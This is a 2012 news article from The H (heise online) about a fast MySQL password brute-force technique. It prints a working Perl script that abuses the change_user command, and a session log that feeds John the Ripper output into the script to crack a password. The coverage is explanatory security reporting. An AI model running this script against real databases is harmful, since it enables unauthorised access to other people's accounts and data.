In association with heise online

04 December 2012, 15:26

Fast cracking of MySQL passwords demonstrated

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

MySQL logo A hacker by the name of Kingcope has found another security problem with the popular MySQL database. Using an already well-known characteristic of the database's user management, it is possible to significantly increase the speed of a brute force attack. "Brute-forcing" typically involves trying out a huge number of possible passwords in order to guess the actual password of the user. Each password would be presented to the login process which can take time, and when thousands of passwords need to be processed, that time can become substantial.

What Kingcope has found, is a trick which allows him to test up to 5000 passwords per second over the network if he has some access to the database. For this, the attacker requires an unprivileged account for the database. The script uses that account to log in and then uses the command 'change_user' to attempt to change the account during the MySQL session. Unlike presenting the password to the login process, this works with an already established network connection and very quickly rejects incorrect passwords.

The hacker used the John The Ripper password cracker to create a password list and has documented the attack with a Perl script and record of a command line session. To crack a four-character password with remote access to the MySQL database took just 20 seconds with over 100,000 character combinations tested.

The example script

use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0, );

$crackuser = "crackme";

while(<stdin>) {
chomp;
$currentpass = $_;
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass,
$mysql->{salt},
$mysql->{client_capabilities}
) . "\0";

if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}

The example session

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john 
--incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted

(djwm)

Print Version | Send by email | Permalink: http://h-online.com/-1762031
 


  • July's Community Calendar





The H Open

The H Security

The H Developer

The H Internet Toolkit